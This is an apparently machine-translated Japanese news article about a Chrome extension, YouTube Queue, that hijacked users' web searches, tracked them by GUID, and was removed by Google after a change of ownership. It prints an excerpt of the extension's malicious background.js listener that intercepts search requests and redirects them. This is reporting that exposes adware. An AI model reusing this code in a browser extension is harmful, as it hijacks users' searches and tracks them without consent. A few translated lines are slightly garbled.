Googleは、ユーザーのウェブ検索を乗っ取っているとの苦情を受けて、プログラムポリシーに違反しているとして、YouTube Queueと呼ばれるChrome拡張機能を公式オンラインストアから削除した。
ただし、同様の疑わしいコードを共有する Croowila Videos Player と呼ばれる別の拡張機能は、依然として利用可能です。
マイクロソフトのプリンシパルプログラムマネージャーであるエリック・ローレンスは月曜日、Twitter で、両拡張機能の JavaScript が「webRequestBlocking API を悪用し、ユーザーの検索クエリを HTTPS ウェブサイトから、安全でない HTTP を使用する広告が満載の予期しない検索エンジンにリダイレクトする」と説明した。
Redditなどのインターネットフォーラムでは、YouTube Queue拡張機能に関する不満が複数寄せられています。削除されたChromeウェブストアのページに投稿されたレビューによると、数千人が利用していたこのアドオンは、今年6月7日頃に不具合が発生したようです。
Youtube Queue(YouTube Queue、YOUTUBE QUEUE、Queue for Youtube と混同しないでください)は、YouTube 動画を次々に並べるのに役立つはずでした。しかし、実際にはウェブ検索クエリを乗っ取り、ネットユーザーを Croowila という検索サービスと Information Vine というウェブページに誘導して広告を表示していました。また、各ユーザーに付与されたグローバル一意識別子(GUID)を送信することで、ウェブ上でユーザーを個別に追跡できるようにしていました。
ああ。pic.twitter.com/kbeJtXNUzZ
— エリック・ローレンス🎻 (@ericlaw) 2019年6月18日
しかし、YouTube Queue拡張機能の責任者を特定するのはGoogleですら困難だった。これは、紛らわしいほど似た拡張機能名を許してしまうChromeウェブストアのセキュリティ手順と監視が緩いことの証左だ。
この問題を知った広告大手は、[email protected]アドオンのメールアドレスとして記載されている と、googlegroups.com および gmail.com に所属する他の 2 つのメールアドレスに連絡し、ソフトウェアの責任者に Chrome ウェブストアからの削除について通知しました。
Google のメッセージには、「開発者様」とあり、「ID: の Google Chrome アイテム「Youtube キュー」は、pgeplakfmipjphmlpnfbeldbficaeackGoogle のプログラム ポリシーに準拠していないため、Google Chrome ウェブストアから削除されました」と書かれています。
しかし、softools.comドメインで運営されているレガシープロセッサツールチェーン企業Softools, Inc.を設立したビル・アウアーバッハ氏によると、同社のサポートアドレスがYouTubeキューページに掲載されていたのは、Googleによる承認や検証がないままだったという。アウアーバッハ氏はThe Registerに対し、Googleから受け取ったメールのコピーを提供した。
「アプリに記載されているサポートアドレスは間違っています」と彼はThe Registerへのメールで述べた。「当社は一切関係ありません。Googleから不具合のあるアプリ/プラグインについて連絡があり、アドレスが間違っていると伝えました。Googleはすでにアプリを削除しています。」
グーグルはコメント要請に応じなかった。
The Registerは、YouTube Queue拡張機能のコードに名前が記載されている開発者、Abhishek Deora氏に連絡を取り、問題の原因を解明しようと試みました。Deora氏のGitHubには「youtube_queue_extension」というプロジェクトがあり、この記事の執筆時点では、削除されたChromeウェブストアのリスティングへのリンクが含まれていました。しかし、このGitHubリポジトリには検索リダイレクトのコードは含まれていませんでした。
100万人以上のユーザーを抱えるChromeウェブ開発プラグインが乗っ取られ、ブラウザに広告を詰め込む
続きを読む
デオラ氏は電子メールで、「最近、この拡張機能をソフトールズ社に売却しました。売却後、こうした問題が発生し始めましたが、もはや私の所有者ではありません」と説明した。(オーアーバッハ氏は英国のソフトールズ社に問い合わせることを提案したが、同社もこのアドウェア拡張機能に何らかの関係があるとは考えにくい。)
デオラ氏は、ユーザーからの苦情を受け、「Queue Tube」という拡張機能の新バージョンを作成したと述べた。このバージョンには、禁止されたバージョンにあった検索リダイレクト機能は含まれていない。
The Registerは、Deora氏からYouTube Queue拡張機能のコードを購入したとされる人物に問い合わせを行いました。この人物はマルウェア研究とコンピュータセキュリティの経験を持つイスラエル人であるようですが、返答はありません。Chromeウェブストアのリストに掲載されているYouTube Queueの開発者情報には、イスラエルのテルアビブの住所が記載されていましたが、softools.comのメールリンクのように不正確な可能性があります。
この欺瞞コードは、ブラウジングセッションごとに一度だけリダイレクトすることで、目立たないようにしています。Youtube Queueの場合、このコードはsrc/js/background.jsにあります。Crowila Videos Playerの場合、拡張機能のルートディレクトリにあるbackground.jsファイルはほぼ同じです。どちらもChrome Extensions APIを利用してchrome.webRequest.onBeforeRequest検索クエリを傍受し、リダイレクトしています。
chrome.webRequest.onBeforeRequest.addListener(function (details) { var isSearchEngineRet; var searchEngine; var handlerDecision; var query; var shouldStartCheck = false; if (details.type == "main_frame") { if (SEARCH_TABS.indexOf(details.tabId) > -1) { return { cancel: false }; } [isSearchEngineRet, searchEngine] = isSearchEngine(details.url); if (isSearchEngineRet == true) { [handlerDecision, query] = SEARCH_ENGINE_PROVIDERS[searchEngine][1](details.url); //console.log(handlerDecision); if (handlerDecision == "pass") { return { cancel: false }; } else if (handlerDecision == "redirect") { SEARCH_TABS.push(details.tabId); //CURRENT_SEARCH_ENGINE = SEARCH_ENGINE_PROVIDERS[searchEngine][0]; return { redirectUrl: REDIRECT_URL + encodeURIComponent(query) }; }
...
この問題に詳しい情報筋はThe Registerに対し、人気の拡張機能を購入し、コードを改変して不正使用を可能にする攻撃は、開発者アカウントのハッキングと並んで一般的な攻撃手法となっており、これが Google が開発者向けに 2FA を推進している理由の 1 つであると語った。®
Chrome拡張機能といえば… Googleは本日、疑わしいサイトをセーフブラウジングチームに報告するためのツール「Suspicious Site Reporter」拡張機能のリリースを発表しました。このツールは、安全でない可能性のあるウェブページにアクセスした場合にアイコンを表示します。
